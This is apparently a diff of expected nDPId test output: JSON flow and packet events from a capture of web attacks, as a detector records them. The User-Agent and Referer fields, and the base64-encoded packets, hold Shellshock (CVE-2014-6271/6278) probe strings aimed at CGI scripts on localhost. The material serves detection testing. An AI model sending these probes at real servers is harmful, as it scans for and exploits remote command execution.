00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277387,"flow_last_seen":1576420277387,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277387,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50448,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_packet_id":1,"flow_last_seen":1576420277387,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277387,"pkt":"AAAAAAAAAAAAAAAACABFAAEL0qJAAEAGaUh\/AAABfwAAAcUQH5BC7upk6xmcJIAYAED+\/wAAAQEICp1m\/bOdZv2zR0VUIC9iYi1oaXN0LnNoIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277387,"flow_last_seen":1576420277387,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277387,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50448,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bb-hist.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277387,"flow_last_seen":1576420277387,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277387,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50448,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bb-hist.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277389,"flow_last_seen":1576420277389,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277389,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50450,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":1,"flow_last_seen":1576420277389,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277389,"pkt":"AAAAAAAAAAAAAAAACABFAAELgRJAAEAGuth\/AAABfwAAAcUSH5B08bnUX64J5YAYAED+\/wAAAQEICp1m\/bWdZv21R0VUIC9iYW5uZXIuY2dpIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KDQo="} -01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277389,"flow_last_seen":1576420277389,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277389,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50450,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/banner.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277389,"flow_last_seen":1576420277389,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277389,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50450,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/banner.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277391,"flow_last_seen":1576420277391,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277391,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50452,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00765{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_packet_id":1,"flow_last_seen":1576420277391,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277391,"pkt":"AAAAAAAAAAAAAAAACABFAAEJF\/tAAEAGI\/J\/AAABfwAAAcUUH5B+1S87jYTLUoAYAED+\/QAAAQEICp1m\/bedZv23R0VUIC9ib29rLmNnaSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} -01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277391,"flow_last_seen":1576420277391,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277391,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50452,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/book.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277391,"flow_last_seen":1576420277391,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277391,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50452,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/book.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277392,"flow_last_seen":1576420277392,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277392,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50454,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_packet_id":1,"flow_last_seen":1576420277392,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277392,"pkt":"AAAAAAAAAAAAAAAACABFAAEM+RhAAEAGQtF\/AAABfwAAAcUWH5DPIMHTViTvW4AYAED\/AAAAAQEICp1m\/bidZv24R0VUIC9jZ2lpbmZvLmNnaSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"} -01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277392,"flow_last_seen":1576420277392,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277392,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50454,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgiinfo.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277392,"flow_last_seen":1576420277392,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277392,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50454,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgiinfo.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277394,"flow_last_seen":1576420277394,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277394,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50456,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_packet_id":1,"flow_last_seen":1576420277394,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277394,"pkt":"AAAAAAAAAAAAAAAACABFAAELY9VAAEAG2BV\/AAABfwAAAcUYH5AazFsY4\/xNyIAYAED+\/wAAAQEICp1m\/bqdZv26R0VUIC9jZ2l0ZXN0LnB5IEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} -01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277394,"flow_last_seen":1576420277394,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277394,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50456,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgitest.py","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277394,"flow_last_seen":1576420277394,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277394,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50456,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgitest.py","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277395,"flow_last_seen":1576420277395,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277395,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50458,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_packet_id":1,"flow_last_seen":1576420277395,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277395,"pkt":"AAAAAAAAAAAAAAAACABFAAEMSAFAAEAG8+h\/AAABfwAAAcUaH5B7UH87Bk0XQYAYAED\/AAAAAQEICp1m\/budZv27R0VUIC9jZ2lfd3JhcHBlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"} -01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277395,"flow_last_seen":1576420277395,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277395,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50458,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi_wrapper","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277395,"flow_last_seen":1576420277395,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277395,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50458,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi_wrapper","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277398,"flow_last_seen":1576420277398,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277398,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50460,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_packet_id":1,"flow_last_seen":1576420277398,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277398,"pkt":"AAAAAAAAAAAAAAAACABFAAEMKndAAEAGEXN\/AAABfwAAAcUcH5BMbxKxdmdFb4AYAED\/AAAAAQEICp1m\/b6dZv2+R0VUIC9jb250YWN0LmNnaSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277398,"flow_last_seen":1576420277398,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277398,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50460,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/contact.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277398,"flow_last_seen":1576420277398,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277398,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50460,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/contact.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 